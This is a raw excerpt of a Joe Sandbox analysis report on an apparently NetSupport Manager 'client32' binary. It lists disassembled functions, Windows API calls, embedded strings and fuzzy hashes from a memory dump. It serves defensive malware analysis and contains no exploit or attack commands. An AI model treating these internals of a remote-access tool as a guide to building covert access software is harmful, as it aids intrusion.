                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Sleep__itow__wcstoi64
                                                                                                                                                                • String ID: **** Reset expire flag$Client$DisableAudio$DisableJoinClass$DisableJournal$DisableJournalMenu$DisableReplayMenu$DisableRequestHelp$DoNewLic received (VistaUI=%d)$Expired$IsFree %d, was free %d$Product$Reset JoinClass, ReplayMenu, RequestHelp, Journal and Audio, ts=%d, vui=%d, config %x$_License
                                                                                                                                                                • API String ID: 4129630603-1903392697
                                                                                                                                                                • Opcode ID: 5f6bc18adebceb937a44eededaee0be923c04fdf4a2cc5f9b1e78570ee760fdf
                                                                                                                                                                • Instruction ID: c697aa05869d8dcbb06e6fa88acd42bec9afcae05c4931e8126933406671653c
                                                                                                                                                                • Opcode Fuzzy Hash: 5f6bc18adebceb937a44eededaee0be923c04fdf4a2cc5f9b1e78570ee760fdf
                                                                                                                                                                • Instruction Fuzzy Hash: 30515A39B8011A7BE751D696DC91FEEFB55AF90B4CFA48015F9293B2C1C7607A01C3A2
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 1115ADD0: IsIconic.USER32(?), ref: 1115AE77
                                                                                                                                                                  • Part of subcall function 1115ADD0: ShowWindow.USER32(?,00000009), ref: 1115AE87
                                                                                                                                                                  • Part of subcall function 1115ADD0: BringWindowToTop.USER32(?), ref: 1115AE91
                                                                                                                                                                • CheckMenuItem.USER32(00000000,000013EB,-00000009), ref: 1102324D
                                                                                                                                                                • ShowWindow.USER32(?,00000003), ref: 110232D1
                                                                                                                                                                • LoadMenuA.USER32(00000000,000013A3), ref: 110233FB
                                                                                                                                                                • GetSubMenu.USER32(00000000,00000000), ref: 11023409
                                                                                                                                                                • CheckMenuItem.USER32(00000000,000013EB,?), ref: 11023429
                                                                                                                                                                • GetDlgItem.USER32(?,000013B2), ref: 1102343C
                                                                                                                                                                • GetWindowRect.USER32(00000000), ref: 11023443
                                                                                                                                                                • PostMessageA.USER32(?,00000111,?,00000000), ref: 11023499
                                                                                                                                                                • DestroyMenu.USER32(?,?,00000000,00000000,00000102,?,?,?,00000000), ref: 110234A3
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Menu$Window$Item$CheckShow$BringDestroyIconicLoadMessagePostRect
                                                                                                                                                                • String ID: AddToJournal$Chat
                                                                                                                                                                • API String ID: 693070851-2976406578
                                                                                                                                                                • Opcode ID: d2fe2766ddb3d34030bb972f012e30f748b4f8edd59272365cd546290ab4e6ab
                                                                                                                                                                • Instruction ID: 337dba7d0f02a97e7c7211def3ec221287211942730252afe18814347e7ecccc
                                                                                                                                                                • Opcode Fuzzy Hash: d2fe2766ddb3d34030bb972f012e30f748b4f8edd59272365cd546290ab4e6ab
                                                                                                                                                                • Instruction Fuzzy Hash: 87A1F178B04616ABDB09DF74CC85FAEB3E5AB88704F504519EA26DF2C0CF74B9408B65
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 11089280: UnhookWindowsHookEx.USER32(?), ref: 110892A3
                                                                                                                                                                • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 110272B4
                                                                                                                                                                  • Part of subcall function 1110F420: _malloc.LIBCMT ref: 1110F439
                                                                                                                                                                  • Part of subcall function 1110F420: wsprintfA.USER32 ref: 1110F454
                                                                                                                                                                  • Part of subcall function 1110F420: _memset.LIBCMT ref: 1110F477
                                                                                                                                                                • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000001F4), ref: 11027323
                                                                                                                                                                • PostMessageA.USER32(000802A6,00000501,00000000,00000000), ref: 11027340
                                                                                                                                                                • SetEvent.KERNEL32(0000029C), ref: 11027351
                                                                                                                                                                • Sleep.KERNEL32(00000032), ref: 11027359
                                                                                                                                                                • PostMessageA.USER32(000802A6,00000800,00000000,00000000), ref: 1102738E
                                                                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 110273BA
                                                                                                                                                                • GetThreadDesktop.USER32(00000000), ref: 110273C1
                                                                                                                                                                • SetThreadDesktop.USER32(00000000), ref: 110273CA
                                                                                                                                                                • CloseDesktop.USER32(00000000), ref: 110273D5
                                                                                                                                                                • CloseHandle.KERNEL32(000003FC), ref: 11027415
                                                                                                                                                                  • Part of subcall function 111100D0: GetCurrentThreadId.KERNEL32 ref: 11110166
                                                                                                                                                                  • Part of subcall function 111100D0: InitializeCriticalSection.KERNEL32(-00000010,?,11031040,00000001,00000000), ref: 11110179
                                                                                                                                                                  • Part of subcall function 111100D0: InitializeCriticalSection.KERNEL32(111F08F0,?,11031040,00000001,00000000), ref: 11110188
                                                                                                                                                                  • Part of subcall function 111100D0: EnterCriticalSection.KERNEL32(111F08F0,?,11031040), ref: 1111019C
                                                                                                                                                                  • Part of subcall function 111100D0: CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,11031040), ref: 111101C2
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Thread$CriticalDesktopEventSection$CloseCreateCurrentInitializeMessagePost$EnterHandleHookMultipleObjectsSleepUnhookWaitWindows_malloc_memsetwsprintf
                                                                                                                                                                • String ID: Async
                                                                                                                                                                • API String ID: 3276504616-2933828738
                                                                                                                                                                • Opcode ID: 7f34267c0eb402a5cecabe7481cb594ff7fa9432527a27f32e6b0a7f9cc990e4
                                                                                                                                                                • Instruction ID: b4c20aaf8d895fc577ef80b9cbd2db14a62b6b62bbca8aebe14e383436c97cb7
                                                                                                                                                                • Opcode Fuzzy Hash: 7f34267c0eb402a5cecabe7481cb594ff7fa9432527a27f32e6b0a7f9cc990e4
                                                                                                                                                                • Instruction Fuzzy Hash: 2641A174A056159FEB05DFF8C886BAEB7A4FB54718F804138E925DB6C4EB70B800CB51
                                                                                                                                                                APIs
                                                                                                                                                                • GetTickCount.KERNEL32 ref: 1110534D
                                                                                                                                                                • EnterCriticalSection.KERNEL32(111F060C,?,00000000,?,?,1114D6ED,?,1118C583,?,1118C583,000000FF,?,1114DAFB), ref: 11105356
                                                                                                                                                                • GetTickCount.KERNEL32 ref: 1110535C
                                                                                                                                                                • GetTickCount.KERNEL32 ref: 1110538E
                                                                                                                                                                • LeaveCriticalSection.KERNEL32(111F060C,?,00000000,?,?,1114D6ED,?,1118C583,?,1118C583,000000FF,?,1114DAFB), ref: 11105397
                                                                                                                                                                • EnterCriticalSection.KERNEL32(?,?,00000000,?,?,1114D6ED,?,1118C583,?,1118C583,000000FF,?,1114DAFB), ref: 111053B8
                                                                                                                                                                • WriteFile.KERNEL32(00000000,1118C583,?,?,00000000,?,00000000,?,?,1114D6ED,?,1118C583,?,1118C583,000000FF), ref: 111053D0
                                                                                                                                                                • LeaveCriticalSection.KERNEL32(?,?,00000000,?,?,1114D6ED,?,1118C583,?,1118C583,000000FF,?,1114DAFB), ref: 111053DD
                                                                                                                                                                • GetTickCount.KERNEL32 ref: 111053EC
                                                                                                                                                                • LeaveCriticalSection.KERNEL32(111F060C,?,00000000,?,?,1114D6ED,?,1118C583,?,1118C583,000000FF,?,1114DAFB), ref: 111053F5
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CriticalSection$CountTick$Leave$Enter$FileWrite
                                                                                                                                                                • String ID: Warning. simap lock held for %d ms$Warning. took %d ms to get simap lock
                                                                                                                                                                • API String ID: 831250470-625438208
                                                                                                                                                                • Opcode ID: 7549535bd9f32612e90d0c37b89a6aa1a9d576740b26f55eee6ebfb36c9c683f
                                                                                                                                                                • Instruction ID: 510883743b079e8f18b7a04972f4ca77f6f871929db96d85a9feff413df15827
                                                                                                                                                                • Opcode Fuzzy Hash: 7549535bd9f32612e90d0c37b89a6aa1a9d576740b26f55eee6ebfb36c9c683f
                                                                                                                                                                • Instruction Fuzzy Hash: F521F37AE10228ABDB009F759CC89AEFBADEB8972DB551075FC15CB204D6609C04CBA0
                                                                                                                                                                APIs
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: wsprintf
                                                                                                                                                                • String ID: AlreadyStarted$AlreadyStopped$BadParam$CannotGetFunc$CannotLoadDll$DllInitFailed$Exception$NoCapClients$NotFound$RequiresVista$StillInstances$Unknown error %d
                                                                                                                                                                APIs
                                                                                                                                                                Strings
                                                                                                                                                                • RESUMEPRINTINGPRINTER=*FILETYPES=, xrefs: 1103D9E2
                                                                                                                                                                • IsA(), xrefs: 1103DA04
                                                                                                                                                                • SETUSBMASSSTORAGEACCESS, xrefs: 1103D963
                                                                                                                                                                • BLOCKPRINTING, xrefs: 1103D9BD
                                                                                                                                                                • e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h, xrefs: 1103D9FF
                                                                                                                                                                • SETOPTICALDRIVEACCESS, xrefs: 1103D994
                                                                                                                                                                • SETUSBMASSSTORAGEACCESSACCESSMODES=%u, xrefs: 1103D986
                                                                                                                                                                • BLOCKPRINTINGPRINTER=*FILETYPES=BLOCK=1, xrefs: 1103D9DB
                                                                                                                                                                • SETOPTICALDRIVEACCESSACCESSMODES=%u, xrefs: 1103D9AF
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: _malloc_memmove
                                                                                                                                                                • String ID: BLOCKPRINTING$BLOCKPRINTINGPRINTER=*FILETYPES=BLOCK=1$IsA()$RESUMEPRINTINGPRINTER=*FILETYPES=$SETOPTICALDRIVEACCESS$SETOPTICALDRIVEACCESSACCESSMODES=%u$SETUSBMASSSTORAGEACCESS$SETUSBMASSSTORAGEACCESSACCESSMODES=%u$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h
                                                                                                                                                                APIs
                                                                                                                                                                • LoadLibraryA.KERNEL32(Kernel32.dll,59FD48C0), ref: 11103683
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,SetThreadExecutionState), ref: 111036C7
                                                                                                                                                                • FreeLibrary.KERNEL32(00000000), ref: 11103704
                                                                                                                                                                  • Part of subcall function 1105DD10: __wcstoi64.LIBCMT ref: 1105DD4D
                                                                                                                                                                • SetLastError.KERNEL32(00000078), ref: 111036DB
                                                                                                                                                                Strings
                                                                                                                                                                • *DisableHighPerfPower, xrefs: 111035FA
                                                                                                                                                                • Prevent Power Save (new count=%d,%d), same state=x%x, xrefs: 11103721
                                                                                                                                                                • Client, xrefs: 111035CB, 111035FF
                                                                                                                                                                • *DisablePreventPowerSave, xrefs: 111035C6
                                                                                                                                                                • Kernel32.dll, xrefs: 11103678
                                                                                                                                                                • SetThreadExecutionState, xrefs: 111036BE
                                                                                                                                                                • Prevent Power Save (new count=%d,%d, newstate=x%x), prevstate=x%x, xrefs: 111036F2
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Library$AddressErrorFreeLastLoadProc__wcstoi64
                                                                                                                                                                • String ID: *DisableHighPerfPower$*DisablePreventPowerSave$Client$Kernel32.dll$Prevent Power Save (new count=%d,%d), same state=x%x$Prevent Power Save (new count=%d,%d, newstate=x%x), prevstate=x%x$SetThreadExecutionState
                                                                                                                                                                APIs
                                                                                                                                                                • GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                                                                                                  • Part of subcall function 11143DE0: GetTickCount.KERNEL32 ref: 11143E48
                                                                                                                                                                • wsprintfA.USER32 ref: 110294B7
                                                                                                                                                                • MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                                                                                                • ExitProcess.KERNEL32 ref: 11029509
                                                                                                                                                                • _strrchr.LIBCMT ref: 11029545
                                                                                                                                                                • ExitProcess.KERNEL32 ref: 11029584
                                                                                                                                                                Strings
                                                                                                                                                                • Info. assert, restarting..., xrefs: 1102956D
                                                                                                                                                                • V12.10F8, xrefs: 110294A3
                                                                                                                                                                • Assert. File %hs, line %d, err %d, Expr %s, xrefs: 11029486
                                                                                                                                                                • Client32, xrefs: 110294E5
                                                                                                                                                                • Assert failed, file %hs, line %d, error code %dBuild: %hsExpression: %s, xrefs: 110294B1
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ExitProcess$CountErrorLastMessageTick_strrchrwsprintf
                                                                                                                                                                • String ID: Assert failed, file %hs, line %d, error code %dBuild: %hsExpression: %s$Assert. File %hs, line %d, err %d, Expr %s$Client32$Info. assert, restarting...$V12.10F8
                                                                                                                                                                • API String ID: 2763122592-3574328345
                                                                                                                                                                • Opcode ID: ba3a97c916ab28f337fc545cafdf3d966e22a8156ced65e074ee0ba6a9a7b855
                                                                                                                                                                • Instruction ID: a7fd37a067bb091250c1763d922fd72d2c7afa3a6e549ffd9321a47320cd30d9
                                                                                                                                                                • Opcode Fuzzy Hash: ba3a97c916ab28f337fc545cafdf3d966e22a8156ced65e074ee0ba6a9a7b855
                                                                                                                                                                • Instruction Fuzzy Hash: D631D975A01226AFEB11DFE5CCC5FBAB768EB5874CF840024F62587184E670A940C761
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 1105DD10: __wcstoi64.LIBCMT ref: 1105DD4D
                                                                                                                                                                • GetVersionExA.KERNEL32(?,View,*NoHideFEP,00000000,00000000,00000001), ref: 1112362F
                                                                                                                                                                • InterlockedExchange.KERNEL32(111F09B4,00000001), ref: 11123655
                                                                                                                                                                • CreateWindowExA.USER32(00000000,button,11194244,50000000,FFFFEC78,00000000,00000014,0000000E,?,00000001,00000000,00000000), ref: 1112369B
                                                                                                                                                                • SetWindowLongA.USER32(00000000,000000FC,11123550), ref: 111236BB
                                                                                                                                                                • SetFocus.USER32(00000000), ref: 111236D2
                                                                                                                                                                • SetWindowLongA.USER32(00000000,000000FC,00000000), ref: 111236EC
                                                                                                                                                                • DestroyWindow.USER32(00000000), ref: 11123702
                                                                                                                                                                • InterlockedExchange.KERNEL32(111F09B4,00000000), ref: 11123719
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Window$ExchangeInterlockedLong$CreateDestroyFocusVersion__wcstoi64
                                                                                                                                                                • String ID: *NoHideFEP$View$button
                                                                                                                                                                • API String ID: 1610953178-1502386645
                                                                                                                                                                • Opcode ID: bdef63e06481d9c0dc03333f194d18eebb477b9bb77329bd89e458592d6cd94a
                                                                                                                                                                • Instruction ID: c38b7b7754d3323b213173b0c8c3b4f9dac41d230a1c05010704e98145613ebf
                                                                                                                                                                • Opcode Fuzzy Hash: bdef63e06481d9c0dc03333f194d18eebb477b9bb77329bd89e458592d6cd94a
                                                                                                                                                                • Instruction Fuzzy Hash: 4F31857061972AABF710DF75CD98B66F7A9FB48718F900128E529D3284FB70A644CB10
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 110EDEB0: LocalAlloc.KERNEL32(00000040,00000014,?,1100D56F,?), ref: 110EDEC0
                                                                                                                                                                  • Part of subcall function 110EDEB0: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,1100D56F,?), ref: 110EDED2
                                                                                                                                                                  • Part of subcall function 110EDEB0: SetSecurityDescriptorDacl.ADVAPI32(00000000,00000001,00000000,00000000,?,1100D56F,?), ref: 110EDEE4
                                                                                                                                                                • CreateEventA.KERNEL32(?,00000000,00000000,00000000), ref: 1100D587
                                                                                                                                                                • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 1100D5A0
                                                                                                                                                                • _strrchr.LIBCMT ref: 1100D5AF
                                                                                                                                                                • GetCurrentProcessId.KERNEL32 ref: 1100D5BF
                                                                                                                                                                • wsprintfA.USER32 ref: 1100D5E0
                                                                                                                                                                • _memset.LIBCMT ref: 1100D5F1
                                                                                                                                                                • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000001,04000000,00000000,00000000,?,?), ref: 1100D629
                                                                                                                                                                • CloseHandle.KERNEL32(?,00000000), ref: 1100D641
                                                                                                                                                                • CloseHandle.KERNEL32(?), ref: 1100D64A
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CloseCreateDescriptorHandleProcessSecurity$AllocCurrentDaclEventFileInitializeLocalModuleName_memset_strrchrwsprintf
                                                                                                                                                                • String ID: %sNSSilence.exe %u %u$D
                                                                                                                                                                • API String ID: 1760462761-4146734959
                                                                                                                                                                • Opcode ID: 556463406fd45f230dce5971ebf4bdbc680ec1c7ea4d85616804ce8ee19078f8
                                                                                                                                                                • Instruction ID: 28a4ee404c217c6c44ddb94e78ca55d5cfefd79278ecf37e22d28a51988c4013
                                                                                                                                                                • Opcode Fuzzy Hash: 556463406fd45f230dce5971ebf4bdbc680ec1c7ea4d85616804ce8ee19078f8
                                                                                                                                                                • Instruction Fuzzy Hash: 78219675A51328ABEB24DBA0CC4AFDEB77CAB08704F104095F619A71C0DAB1BA44CF64
                                                                                                                                                                APIs
                                                                                                                                                                • GetModuleHandleA.KERNEL32(kernel32.dll,ProcessIdToSessionId,00000000,00000000), ref: 110B7946
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 110B794D
                                                                                                                                                                • GetCurrentProcessId.KERNEL32(00000000), ref: 110B7963
                                                                                                                                                                • GetCurrentProcessId.KERNEL32 ref: 110B7981
                                                                                                                                                                • OpenProcess.KERNEL32(00000400,00000000,00000000), ref: 110B798B
                                                                                                                                                                • OpenProcessToken.ADVAPI32(00000000,00000008,00000000), ref: 110B799E
                                                                                                                                                                • GetTokenInformation.ADVAPI32(00000000,0000000C(TokenIntegrityLevel),111E6258,00000004,?), ref: 110B79BD
                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 110B79E4
                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 110B79EB
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Process$Handle$CloseCurrentOpenToken$AddressInformationModuleProc
                                                                                                                                                                • String ID: ProcessIdToSessionId$kernel32.dll
                                                                                                                                                                • API String ID: 2536908267-3889420803
                                                                                                                                                                • Opcode ID: 9ce2d9c11117e9125f749d9db0dd3fd4a1ffca137de9545352435600f6621f01
                                                                                                                                                                • Instruction ID: 695a2acb687fdaf8883a4263dd52dcf391b9a11c2ad5aa445e7569b8d51d2e52
                                                                                                                                                                • Opcode Fuzzy Hash: 9ce2d9c11117e9125f749d9db0dd3fd4a1ffca137de9545352435600f6621f01
                                                                                                                                                                • Instruction Fuzzy Hash: 5721C839E04629A7EB11DBF5DC88F5EBBACEB84719F040165E914E3284DB74D900C750
                                                                                                                                                                APIs
                                                                                                                                                                • GetVersion.KERNEL32(00000000,75730BD0,00000000), ref: 11137363
                                                                                                                                                                • GetModuleHandleA.KERNEL32(ntdll.dll), ref: 11137384
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,VerSetConditionMask), ref: 11137394
                                                                                                                                                                • GetModuleHandleA.KERNEL32(KERNEL32.DLL), ref: 111373B1
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,VerifyVersionInfoA), ref: 111373BD
                                                                                                                                                                • _memset.LIBCMT ref: 111373D7
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: AddressHandleModuleProc$Version_memset
                                                                                                                                                                • String ID: KERNEL32.DLL$Terminal Server$VerSetConditionMask$VerifyVersionInfoA$ntdll.dll
                                                                                                                                                                • API String ID: 1659045089-3162170060
                                                                                                                                                                • Opcode ID: 2782e45080b00d7644363843fb4dac8f82773bfcd6b8b8724ba95a014df5fc97
                                                                                                                                                                • Instruction ID: 0c0b10a14524f440857339b23279ac9494b8b75ce88d62c7832b422cfd240681
                                                                                                                                                                • Opcode Fuzzy Hash: 2782e45080b00d7644363843fb4dac8f82773bfcd6b8b8724ba95a014df5fc97
                                                                                                                                                                • Instruction Fuzzy Hash: CB216A70F10329ABF720AB71AD44F5AFFA99B8871AF000474E914A7189EA71B9048765
                                                                                                                                                                APIs
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: _strtok$_malloc
                                                                                                                                                                • String ID: *extra_bytes$..\ctl32\AUDIO.CPP$Audio$Send EV_CONFIGSET from %s@%d$nbytes <= sizeof (extra_bytes)
                                                                                                                                                                • API String ID: 665538724-3655815180
                                                                                                                                                                • Opcode ID: 0558b598ecd220540cf28659b61802d1f99bc554e79b0dd51561b40af61ee09d
                                                                                                                                                                • Instruction ID: 7c42a3c617dbeb8788080eb1c781ab60080519317ae9ccae606f49ba2c162057
                                                                                                                                                                • Opcode Fuzzy Hash: 0558b598ecd220540cf28659b61802d1f99bc554e79b0dd51561b40af61ee09d
                                                                                                                                                                • Instruction Fuzzy Hash: 49A15774E012299FEB61CF24CC40BDAB7F4AF49744F1480EAD99DA7241E771AA84CF91
                                                                                                                                                                APIs
                                                                                                                                                                • GetDlgItem.USER32(?,00000001), ref: 1103910C
                                                                                                                                                                • IsWindowEnabled.USER32(00000000), ref: 11039113
                                                                                                                                                                • _memset.LIBCMT ref: 11039131
                                                                                                                                                                • GetDlgItemTextA.USER32(?,0000044D,?,00000080), ref: 11039183
                                                                                                                                                                • GetDlgItemTextA.USER32(?,0000044F,00000000,00000080), ref: 110391EB
                                                                                                                                                                • GetDlgItemTextA.USER32(?,000004BE,00000000,00000080), ref: 1103924E
                                                                                                                                                                • GetDlgItemTextA.USER32(?,000017EC,00000000,00000080), ref: 110392B1
                                                                                                                                                                • GetDlgItemTextA.USER32(?,0000048E,00000000,00000080), ref: 11039377
                                                                                                                                                                • GetDlgItemTextA.USER32(?,0000048D,00000000,00000080), ref: 11039314
                                                                                                                                                                  • Part of subcall function 11142800: _strncpy.LIBCMT ref: 11142824
                                                                                                                                                                  • Part of subcall function 11142290: _strncpy.LIBCMT ref: 111422D2
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Item$Text$_strncpy$EnabledWindow_memset
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3085755443-3916222277
                                                                                                                                                                • Opcode ID: 3474633675772f1dfa7fa715227e202affa5940b04f40e4fcdf8bfab1e55feb6
                                                                                                                                                                • Instruction ID: 27c08bceae7d385fa57d2e1d5dbc2d5db1b5a631922e4fecc43e69d3347e8bff
                                                                                                                                                                • Opcode Fuzzy Hash: 3474633675772f1dfa7fa715227e202affa5940b04f40e4fcdf8bfab1e55feb6
                                                                                                                                                                • Instruction Fuzzy Hash: 6D819F75A10706ABE724DB74CC85F9AB3F9BF84704F50C598E2499B181DF71FA448BA0
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 11074A00: InitializeCriticalSection.KERNEL32(0000000C,?,00000000), ref: 11074AE5
                                                                                                                                                                  • Part of subcall function 11074A00: InitializeCriticalSection.KERNEL32(00000024,?,00000000), ref: 11074AEB
                                                                                                                                                                  • Part of subcall function 11074A00: InitializeCriticalSection.KERNEL32(0000003C,?,00000000), ref: 11074AF1
                                                                                                                                                                  • Part of subcall function 11074A00: InitializeCriticalSection.KERNEL32(0000DB1C,?,00000000), ref: 11074AFA
                                                                                                                                                                  • Part of subcall function 11074A00: InitializeCriticalSection.KERNEL32(00000054,?,00000000), ref: 11074B00
                                                                                                                                                                  • Part of subcall function 11074A00: InitializeCriticalSection.KERNEL32(0000006C,?,00000000), ref: 11074B06
                                                                                                                                                                  • Part of subcall function 1110F420: _malloc.LIBCMT ref: 1110F439
                                                                                                                                                                  • Part of subcall function 1110F420: wsprintfA.USER32 ref: 1110F454
                                                                                                                                                                  • Part of subcall function 1110F420: _memset.LIBCMT ref: 1110F477
                                                                                                                                                                • std::exception::exception.LIBCMT ref: 1114DACC
                                                                                                                                                                • __CxxThrowException@8.LIBCMT ref: 1114DAE1
                                                                                                                                                                  • Part of subcall function 1105DD10: __wcstoi64.LIBCMT ref: 1105DD4D
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CriticalInitializeSection$Exception@8Throw__wcstoi64_malloc_memsetstd::exception::exceptionwsprintf
                                                                                                                                                                • String ID: TracePipe$TracePipeRecv$TracePipeRecvUI$TracePipeSend$TracePipeSendUI$TraceRecv$TraceSend$_debug
                                                                                                                                                                • API String ID: 2906687742-2018363409
                                                                                                                                                                • Opcode ID: c083690a5e1e9880a6ab3f9e2642703f398a8d4a618d0d436e8e73249eeeeae6
                                                                                                                                                                • Instruction ID: f2cf1ee30c1a9215aec081895272530a5bdc1272587a17d20c2ddc6b3b073753
                                                                                                                                                                • Opcode Fuzzy Hash: c083690a5e1e9880a6ab3f9e2642703f398a8d4a618d0d436e8e73249eeeeae6
                                                                                                                                                                • Instruction Fuzzy Hash: 1F51C5B5B04649AFDB50DF798C80BAFFAE8EB58604F61482EE556D3740D730A9018762
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 1105DD10: __wcstoi64.LIBCMT ref: 1105DD4D
                                                                                                                                                                • GetLastError.KERNEL32(Client,00000000,00000001,00000000,00000000,1105A92A,00000001,562258), ref: 110FF7C6
